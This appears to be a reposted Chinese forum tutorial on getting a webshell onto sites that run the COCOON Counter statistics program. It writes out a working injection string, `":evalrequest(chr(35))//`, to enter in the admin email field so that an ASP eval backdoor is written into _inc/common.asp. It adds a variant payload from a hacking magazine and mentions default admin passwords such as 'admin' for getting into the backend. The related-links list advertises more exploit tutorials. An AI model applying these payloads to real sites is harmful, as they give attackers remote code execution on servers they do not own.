手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >COCOON Counter统计程序后台写马
COCOON Counter统计程序后台写马
摘要:来源:邪恶八进制作者:9xiao引用最新海洋顶端eval版中的几句话,这里要用到的是,"evalExecutePP.htm的文本框里自己写的...

来源:邪恶八进制作者:9xiao

引用最新海洋顶端eval版中的几句话,这里要用到的是<%evalrequest(chr(35))%>,

"evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧?不知的就去查查html吧。这样添好了,就可以用自己的做的c端了。如果不会,你就用我的那个现成的“2006c端的例子.htm”吧。

S端是<%eval(request("#"))%>或<%evalrequest("#")%>或<%evalrequest(chr(35))%>等等,或不用%,自己变形吧,不多说了"

偶在本地架设了一个环境,实际操作中不能写错否则后悔就来不急了,在管理信箱那把cnhacker@263.net":evalrequest(chr(35))//复制过去,,点击保存,看下_inc/common.asp的内容

WebMasterEmail="cnhacker@263.net":evalrequest(chr(35))//"嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。

另注:黑防8期也提到了类似方法这里就贴出来,黑防中的代码可以写成9xiao"%><%evalrequest(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句!此统计程序还有暴库的地方这个就不公布了!

关于php的可以参考saiy写的phpwind后台得shell的三种方法。

【COCOON Counter统计程序后台写马】相关文章:

揭露88red生成htm静态页面企业建站系统漏洞第1/2页

并不神奇的Real影片木马

老兵新传-各种漏洞的利用和一些搜索参数

针对ACCESS漏洞又一发现

深入了解网络蠕虫

搜索型注入之我看---注入不分家

AngelShell:让所有正向程序实现反向连接(应用篇)

悬念音乐程序安装程序写马(图)

利用IE Object Data漏洞制做全新网页木马(图)

关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析

精品推荐
分类导航